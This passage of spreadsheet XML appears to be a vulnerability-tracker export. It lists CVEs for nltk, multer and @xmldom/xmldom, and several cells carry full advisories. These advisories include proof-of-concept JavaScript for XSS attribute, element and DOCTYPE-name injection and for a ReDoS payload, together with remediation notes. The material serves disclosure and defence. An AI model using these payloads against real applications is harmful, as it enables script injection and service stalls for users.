r="A42" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B42" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C42" s="5" t="inlineStr"><is><t>CVE-2026-79676</t></is></c><c r="D42" s="5" t="inlineStr" /><c r="E42" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F42" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G42" s="5" t="inlineStr" /><c r="H42" s="5" t="n"><v>0.003</v></c><c r="I42" s="5" t="inlineStr" /><c r="J42" s="5" t="inlineStr" /><c r="K42" s="5" t="inlineStr" /><c r="L42" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M42" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N42" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O42" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P42" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q42" s="5" t="inlineStr" /><c r="R42" s="5" t="inlineStr" /><c r="S42" s="5" t="inlineStr"><is><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is></c><c r="T42" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79676</t></is></c></row><row r="43"><c r="A43" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B43" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C43" s="5" t="inlineStr"><is><t>CVE-2026-80205</t></is></c><c r="D43" s="5" t="inlineStr" /><c r="E43" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F43" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G43" s="5" t="inlineStr" /><c r="H43" s="5" t="n"><v>0.005</v></c><c r="I43" s="5" t="inlineStr" /><c r="J43" s="5" t="inlineStr" /><c r="K43" s="5" t="inlineStr" /><c r="L43" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M43" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N43" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O43" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P43" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q43" s="5" t="inlineStr" /><c r="R43" s="5" t="inlineStr" /><c r="S43" s="5" t="inlineStr"><is><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is></c><c r="T43" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80205</t></is></c></row><row r="44"><c r="A44" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B44" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C44" s="5" t="inlineStr"><is><t>CVE-2026-80206</t></is></c><c r="D44" s="5" t="inlineStr" /><c r="E44" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F44" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G44" s="5" t="inlineStr" /><c r="H44" s="5" t="n"><v>0.003</v></c><c r="I44" s="5" t="inlineStr" /><c r="J44" s="5" t="inlineStr" /><c r="K44" s="5" t="inlineStr" /><c r="L44" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M44" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N44" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O44" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P44" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q44" s="5" t="inlineStr" /><c r="R44" s="5" t="inlineStr" /><c r="S44" s="5" t="inlineStr"><is><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is></c><c r="T44" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80206</t></is></c></row><row r="45"><c r="A45" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B45" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C45" s="5" t="inlineStr"><is><t>CVE-2026-81725</t></is></c><c r="D45" s="5" t="inlineStr" /><c r="E45" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F45" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G45" s="5" t="inlineStr" /><c r="H45" s="5" t="n"><v>0.002</v></c><c r="I45" s="5" t="inlineStr" /><c r="J45" s="5" t="inlineStr" /><c r="K45" s="5" t="inlineStr" /><c r="L45" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M45" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N45" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O45" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P45" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q45" s="5" t="inlineStr" /><c r="R45" s="5" t="inlineStr" /><c r="S45" s="5" t="inlineStr"><is><t>### Summary

`Pl196xCorpusReader` still parses whole TEI blocks with multiple lazy regexes over attacker-controlled text. A malformed file with many opening tags and no matching closing tags forces repeated rescans and produces quadratic CPU growth in public reader APIs.

### Details

- **Vulnerability type:** Regular-expression denial of service
- **Affected component:** `nltk.corpus.reader.pl196x.TEICorpusView.read_block` and `Pl196xCorpusReader` public methods
- **Affected versions:** Published `3.9.4` and current source `v3.10.0-rc2` both reproduced.
- **Patched versions:** Not yet patched
- **Root cause:** Lazy `.*?` whole-block regexes rescan untrusted XML-like blocks from each opening-tag position.

The parser uses regexes for paragraphs, sentences, and word tags across the whole `&lt;text&gt;` block. When the attacker supplies many unmatched opening tags, each attempt scans toward the end of the block and fails, then restarts from the next opening tag. There is near four-times runtime growth each time the number of malformed `&lt;p&gt;` tags doubled, through normal public calls such as `words()` and `tagged_words()`.

### PoC

**Preconditions**
- The application parses attacker-influenced PL196X or TEI-like corpus files through public reader APIs.

**Steps**
1. Create a corpus file with a valid header followed by a `&lt;text&gt;` block that contains many opening tags and no matching closing tags.
2. Instantiate `Pl196xCorpusReader` on that corpus.
3. Call `words()` or `tagged_words()` and measure elapsed time as the malformed tag count doubles.
4. Observe near quadratic growth instead of near-linear behavior.

**Minimal reproducible excerpt**

```text
size=1000 0.014s
size=2000 0.057s
size=4000 0.231s
size=8000 0.927s
```

### Impact

A consumer that accepts attacker-influenced corpus files can be forced into heavy CPU use and parser-thread stalling before the application concludes the input contains no valid content.

### Remediation

Replace the whole-block lazy-regex parser with a linear parser or bounded tokenizer, and add regression tests that assert near-linear behavior on malformed inputs with many unmatched tags.</t></is></c><c r="T45" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81725</t></is></c></row><row r="46"><c r="A46" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B46" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C46" s="5" t="inlineStr"><is><t>CVE-2026-82333</t></is></c><c r="D46" s="5" t="inlineStr" /><c r="E46" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F46" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G46" s="5" t="inlineStr" /><c r="H46" s="5" t="n"><v>0.003</v></c><c r="I46" s="5" t="inlineStr" /><c r="J46" s="5" t="inlineStr" /><c r="K46" s="5" t="inlineStr" /><c r="L46" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M46" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N46" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O46" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P46" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q46" s="5" t="inlineStr" /><c r="R46" s="5" t="inlineStr" /><c r="S46" s="5" t="inlineStr"><is><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is></c><c r="T46" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82333</t></is></c></row><row r="47"><c r="A47" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B47" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C47" s="5" t="inlineStr"><is><t>CVE-2026-83605</t></is></c><c r="D47" s="5" t="inlineStr" /><c r="E47" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F47" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G47" s="5" t="inlineStr" /><c r="H47" s="5" t="n"><v>0.003</v></c><c r="I47" s="5" t="inlineStr" /><c r="J47" s="5" t="inlineStr" /><c r="K47" s="5" t="inlineStr" /><c r="L47" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M47" s="5" t="inlineStr"><is><t>0.8.14, 0.9.11</t></is></c><c r="N47" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O47" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P47" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q47" s="5" t="inlineStr" /><c r="R47" s="5" t="inlineStr" /><c r="S47" s="5" t="inlineStr"><is><t>## Summary

`Element.setAttribute()` in `@xmldom/xmldom` bypasses attribute name validation by calling the private `_createAttribute(name)` method, which performs no validation. The public `createAttribute()` method correctly validates names against an anchored `QName` pattern, but `setAttribute()` never uses it. The serializer escapes attribute *values* but trusts attribute *names*, allowing an attacker to inject additional attributes (including event handlers) into serialized output. The `requireWellFormed: true` option did not catch this.

## Details

`Element.setAttribute(name, value)` creates attribute nodes by calling the private `_createAttribute(name)` method, which performs no validation on the `name` parameter. In contrast, the public `Document.createAttribute(name)` method validates the name against the `QName` production before creating the attribute node.

The result is a two-tier validation system where the most commonly used API (`setAttribute`) takes the unvalidated path:

- `doc.createAttribute("bad name")` — throws `INVALID_CHARACTER_ERR` (correct).
- `el.setAttribute("bad name", "value")` — succeeds silently (vulnerable).

The serializer emits attribute names verbatim into the output. Because attribute values ARE escaped (quotes, ampersands, etc.), the injection must occur through the name. An attacker can terminate the current attribute and inject new ones by including quote and space characters in the attribute name.

### Root Cause

1. `setAttribute()` calls `_createAttribute()` (private, no validation) instead of `createAttribute()` (public, validates against `QName`).
2. The serializer trusts attribute names and emits them unescaped.
3. The serializer's `requireWellFormed` code path did not validate attribute names during serialization.

## Proof of Concept

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const impl = new DOMImplementation();
const serializer = new XMLSerializer();
const doc = impl.createDocument(null, 'root', null);

// The attribute name contains a closing quote, a space, and a new attribute
doc.documentElement.setAttribute('class="safe" onclick', 'alert(1)');

const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// &lt;root class="safe" onclick="alert(1)"/&gt;
//
// The single setAttribute() call produced TWO attributes:
//   1. class="safe"
//   2. onclick="alert(1)"
//
// requireWellFormed: true did NOT prevent the injection.
```

### Demonstrating the validation gap

```js
// Public createAttribute correctly rejects invalid names:
try {
  doc.createAttribute('class="safe" onclick');
} catch (e) {
  console.log('createAttribute rejects:', e.message);
}

// But setAttribute (which uses _createAttribute) accepts the same input:
doc.documentElement.setAttribute('class="safe" onclick', 'alert(1)');
// No error thrown
```

## Impact

Applications that use `setAttribute()` with any user-controlled portion of the attribute name are vulnerable to attribute injection attacks. This includes:

- **Cross-Site Scripting (XSS)**: Injecting event handler attributes into HTML output consumed by browsers.
- **Security attribute override**: Overriding security-relevant attributes such as `integrity`, `nonce`, `sandbox`, or `Content-Security-Policy` meta attributes.
- **Validation bypass**: The public `createAttribute()` API validates while `setAttribute()` does not, creating an inconsistent security boundary that developers cannot rely on.
- **requireWellFormed bypass**: Applications that adopted `requireWellFormed: true` as a mitigation for prior CVEs remained vulnerable.

`@xmldom/xmldom` can also be used inside browsers, where it mirrors the DOM API. Unlike the browser's `setAttribute()`, which rejects an invalid attribute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serialized attribute's qualified name against the XML `QName` production and throws `InvalidStateError` before emitting it. This covers ordinary attribute names **and** synthesized `xmlns:PREFIX` namespace declarations (the namespace-prefix sub-vector).

Fixed under `requireWellFormed: true` in `@xmldom/xmldom` **0.9.11** and **0.8.14**. Default serialization is unchanged.

### PoC — fixed path

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const doc = new DOMImplementation().createDocument(null, 'root', null);
doc.documentElement.setAttribute('class="safe" onclick', 'alert(1)');

// Default (unchanged): verbatim — injection present
console.log(new XMLSerializer().serializeToString(doc));
// &lt;root class="safe" onclick="alert(1)"/&gt;

// Opt-in guard: throws InvalidStateError before serializing
try {
  new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
} catch (e) {
  console.log(e.name, e.message);
  // InvalidStateError: The attribute name "class="safe" onclick" is not a valid XML QName
}
```

### Why the default stays verbatim

The W3C DOM Parsing and Serialization spec defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the serializer emits attribute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`setAttribute(name, value)` does not validate `name` at creation time (unlike the public `createAttribute()`, which already does). Making `setAttribute()` reject invalid names unconditionally is a breaking change and is deferred to the next breaking release. When the default serialization path is used (without `requireWellFormed: true`), attribute names set via `setAttribute()` are still emitted verbatim; applications that do not pass `requireWellFormed: true` remain exposed.

Creation-time validation is tracked in a public issue on the next breaking-release milestone (filed at publication — issue link to be added), targeting the next breaking release.</t></is></c><c r="T47" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83605</t></is></c></row><row r="48"><c r="A48" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B48" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C48" s="5" t="inlineStr"><is><t>CVE-2026-83606</t></is></c><c r="D48" s="5" t="inlineStr" /><c r="E48" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F48" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G48" s="5" t="inlineStr" /><c r="H48" s="5" t="n"><v>0.003</v></c><c r="I48" s="5" t="inlineStr" /><c r="J48" s="5" t="inlineStr" /><c r="K48" s="5" t="inlineStr" /><c r="L48" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M48" s="5" t="inlineStr"><is><t>0.9.11</t></is></c><c r="N48" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O48" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P48" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q48" s="5" t="inlineStr" /><c r="R48" s="5" t="inlineStr" /><c r="S48" s="5" t="inlineStr"><is><t>## Summary

`@xmldom/xmldom`'s processing-instruction (PI) grammar regex exhibits quadratic-time backtracking
(ReDoS) when parsing an **unterminated** processing instruction. A single small XML document
containing `&lt;?` + a target + a long run of whitespace and no closing `?&gt;` forces the regular
expression engine into O(n²) work, stalling the Node.js event loop. The input is parsed with
`DOMParser.parseFromString` under **default options**, so it is reachable from unauthenticated,
network-delivered XML (SOAP/SAML, webhooks, uploads, XML APIs).

## Details

The PI production in `lib/grammar.js` compiles (flags `mu`) to:

```
^&lt;\?(NameChars)(?:[\x20\x09\x0D\x0A]+([Char]*?))?\?&gt;
                     ^^^ S+ greedy       ^^^ Char*? lazy
```

- `lib/grammar.js` line 261: https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/grammar.js#L261

In the optional tail `(?:S+(Char*?))?`, both the greedy separator `S+` and the lazy data `Char*?`
match XML whitespace. When the required trailing `?&gt;` is absent, the engine must ultimately fail —
but first it tries every partition of the whitespace run between `S+` and `Char*?`, which is O(n²)
in the length of the trailing whitespace.

The regex is executed against the **entire remaining source string** in two places in `lib/sax.js`,
so the whole whitespace tail is scanned:

- `parsePI` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L680-L691
- `parseProcessingInstruction` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L862-L879

## Affected Versions

Only the `0.9.x` line is affected. `lib/grammar.js` (and this PI regex) was introduced in
commit `726b471` ("fix!: preserve DOCTYPE internal subset (#498)"), first released in
**0.9.0-beta.9**, and is unchanged through **0.9.10**.

The `0.8.x` line (≤ 0.8.13) and the unscoped `xmldom` package (≤ 0.6.0) parse PIs via a different
code path bounded by `indexOf('?&gt;')` — they do **not** contain this regex and are **not affected**
by this issue. (They were not separately tested for a *different* PI ReDoS; the scope here is the
specific `grammar.js` regex.)

| Line | PI code path | Affected? |
|---|---|---|
| `0.9.x` (0.9.0-beta.9 … 0.9.10) | `grammar.js` `PI` regex over full remaining source | **Yes** |
| `0.8.x` (≤ 0.8.13) | `parseInstruction`, bounded by `indexOf('?&gt;')` | No |
| unscoped `xmldom` (≤ 0.6.0) | older `indexOf('?&gt;')`-bounded parsing | No |

## Proof of Concept

```js
const { DOMParser } = require('@xmldom/xmldom');
const n = 32 * 1024;
const payload = '&lt;a&gt;&lt;?p' + ' '.repeat(n); // unterminated PI, no `?&gt;`
console.time('parse');
new DOMParser().parseFromString(payload, 'text/xml');
console.timeEnd('parse');
```

Measured (Node 18), trailing whitespace after `&lt;?p`, no `?&gt;` — time quadruples per doubling of
input length (canonical O(n²)):

| Trailing whitespace | `g.PI.exec` | `parseFromString` |
|---|---|---|
| 2 KB  | 4.4 ms    | 5.1 ms   |
| 4 KB  | 16.9 ms   | 17.0 ms  |
| 8 KB  | 111.4 ms  | 66.3 ms  |
| 16 KB | 263.8 ms  | 336.5 ms |
| 32 KB | 1073.1 ms | —        |

## Impact

Availability only: a single parse of a small crafted document blocks the Node.js event loop for the
duration of the quadratic scan (≈1 s at 32 KB; multi-second with larger inputs). No memory blow-up,
no data exposure, no integrity impact. Because XML is routinely accepted from untrusted sources and
parsed with default options, one request can stall a server.

## Fix Applied

Fixed in `@xmldom/xmldom` **0.9.11** (`0.9.x`-only; the `0.8.x` LTS line and the
unscoped `xmldom` package use a different, bounded PI code path and are not affected).

PR [#1039](https://github.com/xmldom/xmldom/pull/1039) inserts a fixed-width negative lookahead
`(?!\s)` immediately after the greedy `S+`, so the separator can no longer hand whitespace back to
the lazy data group:

```
- var PI = reg(/^&lt;\?/, '(', Name, ')', regg(S, '(', Char, '*?)'), '?', /\?&gt;/);
+ var PI = reg(/^&lt;\?/, '(', Name, ')', regg(S, '(?!', _SChar, ')(', Char, '*?)'), '?', /\?&gt;/);
```

The change is correct, minimal, and behavior-preserving: it produces identical `[target, data]`
captures on all valid PIs tested (incl. whitespace-heavy, tab/newline, empty-data, and xml-decl
cases) and removes the backtracking blow-up (linear, ~0.4 ms at 128 KB after the fix). The lookahead
is fixed-width and cannot itself backtrack — a strict improvement with no new parsing risk.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48" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83606</t></is></c></row><row r="49"><c r="A49" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B49" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C49" s="5" t="inlineStr"><is><t>CVE-2026-83607</t></is></c><c r="D49" s="5" t="inlineStr" /><c r="E49" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F49" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G49" s="5" t="inlineStr" /><c r="H49" s="5" t="n"><v>0.003</v></c><c r="I49" s="5" t="inlineStr" /><c r="J49" s="5" t="inlineStr" /><c r="K49" s="5" t="inlineStr" /><c r="L49" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M49" s="5" t="inlineStr"><is><t>0.8.14, 0.9.11</t></is></c><c r="N49" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O49" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P49" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q49" s="5" t="inlineStr" /><c r="R49" s="5" t="inlineStr" /><c r="S49" s="5" t="inlineStr"><is><t>## Summary

`Document.createElement()` in `@xmldom/xmldom` accepts arbitrary strings as the `tagName` parameter with zero validation. The serializer emits the tag name verbatim into XML/HTML output. Critically, the `requireWellFormed: true` serializer option — the recommended mitigation from CVE-2026-41672, CVE-2026-41674, and CVE-2026-34601 — did NOT catch this, making it a bypass of the existing security controls.

An attacker who controls the element name string can inject arbitrary attributes (including event handlers) into the serialized output, leading to XSS when the output is consumed by a browser or downstream parser.

## Details

`Document.createElement()` accepts any string as `tagName` and stores it directly on the element node without validation. When the document is later serialized via `XMLSerializer.serializeToString()`, the serializer emits the `tagName` verbatim into the output.

The XML specification requires element names to conform to the `Name` production. The existing `createAttributeNS()` and `createElementNS()` methods validate qualified names against an anchored name/`QName` pattern, but `createElement()` bypasses this entirely, and the `requireWellFormed: true` serializer path performed no element-name validation — rendering it ineffective against this vector.

### Root Cause

1. `createElement()` stores the raw `tagName` string without any validation.
2. The serializer's `requireWellFormed` code path did not validate element names against the XML `Name`/`QName` production.
3. The serializer emits `tagName` directly into angle brackets: `&lt;${tagName}...&gt;`.

## Proof of Concept

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const impl = new DOMImplementation();
const serializer = new XMLSerializer();
const doc = impl.createDocument(null, 'root', null);

// Inject an element whose "name" contains attributes with an XSS payload
const el = doc.createElement('img src=x onerror="alert(1)"');
doc.documentElement.appendChild(el);

const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// &lt;root&gt;&lt;img src=x onerror="alert(1)"/&gt;&lt;/root&gt;
//
// A browser parsing this HTML will execute alert(1).
// requireWellFormed: true did NOT prevent the injection.
```

## Impact

Applications that use `@xmldom/xmldom` to construct DOM trees and serialize them to XML/HTML are vulnerable to injection attacks if any part of an element name originates from user input. This includes:

- **Cross-Site Scripting (XSS)**: Injecting event handler attributes (`onerror`, `onclick`, etc.) into HTML output consumed by browsers.
- **XML injection**: Breaking XML document structure by injecting closing tags, new elements, or processing instructions through the element name.
- **Security control bypass**: Applications that adopted `requireWellFormed: true` as a mitigation for CVE-2026-41672 / 41674 / 34601 remained vulnerable through this vector.

`@xmldom/xmldom` can also be used inside browsers, where it mirrors the DOM API. Unlike the browser's `createElement()`, which rejects an invalid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element's serialized qualified name against the XML `QName` production and throws `InvalidStateError` before emitting the start tag. This also covers the **namespace-prefix** sub-vector: an invalid prefix surfaces either in the element qualified name (`PREFIX:local`) or in a synthesized `xmlns:PREFIX` declaration, and both are QName-checked.

Fixed under `requireWellFormed: true` in `@xmldom/xmldom` **0.9.11** and **0.8.14**. Default serialization is unchanged.

### PoC — fixed path

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const doc = new DOMImplementation().createDocument(null, 'root', null);
doc.documentElement.appendChild(doc.createElement('img src=x onerror="alert(1)"'));

// Default (unchanged): verbatim — injection present
console.log(new XMLSerializer().serializeToString(doc));
// &lt;root&gt;&lt;img src=x onerror="alert(1)"/&gt;&lt;/root&gt;

// Opt-in guard: throws InvalidStateError before serializing
try {
  new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
} catch (e) {
  console.log(e.name, e.message);
  // InvalidStateError: The element name "img src=x onerror="alert(1)"" is not a valid XML QName
}
```

### Why the default stays verbatim

The W3C DOM Parsing and Serialization spec defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the serializer emits element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`createElement(tagName)` does not validate `tagName` at creation time. Enforcing an `InvalidCharacterError` for invalid names unconditionally at creation time is a breaking change and is deferred to the next breaking release. When the default serialization path is used (without `requireWellFormed: true`), invalid element names are still emitted verbatim; applications that do not pass `requireWellFormed: true` remain exposed.

Creation-time validation is tracked in a public issue on the next breaking-release milestone (filed at publication — issue link to be added), targeting the next breaking release.</t></is></c><c r="T49" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83607</t></is></c></row><row r="50"><c r="A50" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B50" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C50" s="5" t="inlineStr"><is><t>CVE-2026-83608</t></is></c><c r="D50" s="5" t="inlineStr" /><c r="E50" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F50" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G50" s="5" t="inlineStr" /><c r="H50" s="5" t="n"><v>0.003</v></c><c r="I50" s="5" t="inlineStr" /><c r="J50" s="5" t="inlineStr" /><c r="K50" s="5" t="inlineStr" /><c r="L50" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M50" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N50" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O50" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P50" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q50" s="5" t="inlineStr" /><c r="R50" s="5" t="inlineStr" /><c r="S50" s="5" t="inlineStr"><is><t>## Summary

The `@xmldom/xmldom` serializer emits `DocumentType.name` verbatim into the
`&lt;!DOCTYPE …&gt;` declaration with no well-formedness guard. GHSA-f6ww-3ggp-fr8h
(CVE-2026-41674) hardened the serializer's `requireWellFormed` path for a
DocumentType's sibling fields — `publicId`, `systemId`, and `internalSubset` —
but it did **not** add any check for `name`. A `&gt;` (or whitespace) in the name
terminates the doctype declaration early, letting the remaining characters
become sibling markup in the serialized output.

Because `requireWellFormed: true` — the recommended mitigation for the prior
xmldom injection CVEs — performs no validation on the DocType `name`, this is a
bypass of that control, in the same family as the open element-name
(GHSA-w2rr-34g9-rvrj) and attribute-name (GHSA-4w3w-2rp5-g8jm) name-injection advisories.

## Details

The serializer's `DOCUMENT_TYPE_NODE` case runs the `requireWellFormed` block
only against `publicId`, `systemId`, and `internalSubset`, then pushes
`n.name` directly into the buffer between the `&lt;!DOCTYPE ` prefix and the
closing `&gt;`:

- 0.9.x (v0.9.10, `bb7a085`):
  [serializer DocType case, `lib/dom.js#L3256-L3283`](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L3256-L3283)
  — the `requireWellFormed` block ([#L3259-L3269](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L3259-L3269))
  validates `publicId`/`systemId`/`internalSubset` but not `name`, which is
  emitted verbatim at [#L3270](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L3270).
- 0.8.x (v0.8.13, `e5c1480`):
  [serializer DocType case, `lib/dom.js#L1914-L1946`](https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L1914-L1946)
  — same structure; `name` is emitted verbatim at [#L1928](https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L1928).
- unscoped `xmldom` (v0.6.0, `c80a161`):
  [`lib/dom.js#L1105`](https://github.com/xmldom/xmldom/blob/c80a161172cc4d8733583bf0cf59abfa589f6d9e/lib/dom.js#L1105)
  emits `node.name` verbatim; this line predates `requireWellFormed`, so there
  is no well-formedness path at all.

### Enabling write paths

`DocumentType.name` is a plain, writable own-property, so the enabling vector
differs by line:

- **0.9.x** — `createDocumentType()` validates the name via
  `validateQualifiedName` ([`lib/dom.js#L925-L936`](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L925-L936),
  validation at [#L926](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L926)),
  so the deliverable vector is a **direct property write**
  (`dt.name = 'html&gt;&lt;script&gt;…'`) to the unguarded own-property.
- **0.8.x** — `createDocumentType()` does **not** validate the name
  ([`lib/dom.js#L456-L464`](https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L456-L464)),
  so the malicious name is reachable directly through `createDocumentType()` as
  well as via direct property write.
- **unscoped `xmldom` (&lt;= 0.6.0)** — `createDocumentType()` does not validate
  the name ([`lib/dom.js#L286`](https://github.com/xmldom/xmldom/blob/c80a161172cc4d8733583bf0cf59abfa589f6d9e/lib/dom.js#L286)),
  same as 0.8.x.

This is the same structural root cause the sibling name-injection advisories
share: the serializer's `requireWellFormed` path validates content delimiters
but no name field, and every name-like field is a plain writable property, so
mutation / direct property-write bypasses any creation-time check.

### Root Cause

1. The serializer's `requireWellFormed` DocType block checks `publicId`,
   `systemId`, and `internalSubset` (the fields hardened by GHSA-f6ww-3ggp-fr8h)
   but has no check for `name`.
2. `DocumentType.name` is a plain writable own-property; on 0.8.x and the
   unscoped package `createDocumentType()` does not validate it either.
3. The serializer emits `name` directly between the doctype delimiters:
   `&lt;!DOCTYPE ${name}…&gt;`.

## Proof of Concept

Run against `@xmldom/xmldom` v0.9.10 (commit `bb7a085`):

```javascript
const { DOMImplementation, XMLSerializer, DOMParser } = require('@xmldom/xmldom');

const impl = new DOMImplementation();
const serializer = new XMLSerializer();

// 0.9.x createDocumentType validates the name, so overwrite it via direct property write
const dt = impl.createDocumentType('html', '', '');
dt.name = 'html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script';
const doc = impl.createDocument(null, 'r', dt);

const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// Output: &lt;!DOCTYPE html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;r/&gt;
//
// requireWellFormed: true did NOT prevent the injection (no exception thrown).
// The injected &lt;script&gt; is well-formed XHTML that a browser would execute.
```

Confirmed runtime behavior:

- **0.9.x** — `createDocumentType()` rejects the malicious name at creation
  (`InvalidCharacterError`); a direct write to `dt.name` bypasses that, and
  `serializeToString(…, { requireWellFormed: true })` emits the breakout with no
  exception.
- **Re-parse confirmation** — re-parsing the output shows the injected
  `&lt;script&gt;` is a real second top-level element originating entirely from the
  DocType name: the parser rejects it with
  `HierarchyRequestError: Only one element can be added and only after doctype`.
